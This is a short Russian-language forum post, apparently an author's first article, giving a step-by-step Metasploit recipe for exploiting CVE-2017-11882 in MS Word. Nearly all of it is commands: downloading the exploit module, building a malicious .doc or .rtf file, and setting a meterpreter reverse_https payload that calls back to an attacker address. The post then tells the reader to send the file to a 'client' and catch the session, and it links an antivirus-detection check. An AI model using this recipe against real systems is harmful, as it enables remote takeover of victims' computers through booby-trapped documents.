Сегодня речь пойдёт о эксплоите CVE-2017-11882 MS Word Metasploit с помощью которого мы будем получать meterpreter сессию с документа MS Word Скачаем и перенесём эсплоит wget https://raw.githubusercontent.com/r...loits/windows/fileformat/office_ms17_11882.rb cp office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/ Запускаем metasploit и выбираем наш модуль. service postgresql start msfconsole use exploit/windows/fileformat/office_ms17_11882 Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой set FILENAME /root/exp.doc (Можно поставить и *.rtf, отработает и так и так.) Добавляем пейлоад и запускаем set payload windows/meterpreter/reverse_https set lhost 192.168.0.100 (адрес атакующего) set lport 4444(как обычно, можете выбирать почти любой) exploit Собственно, всё. Берём файл, отправляем клиенту (себе на виртуалку, ибо в целях образовательных используем информацию мы). Запускаем, ловим сессию. К сожалению AV так же не стоит на месте https://nodistribute.com/result/BUZqx1mACKldLr3 P.S.моя первая статья ,не судите строго.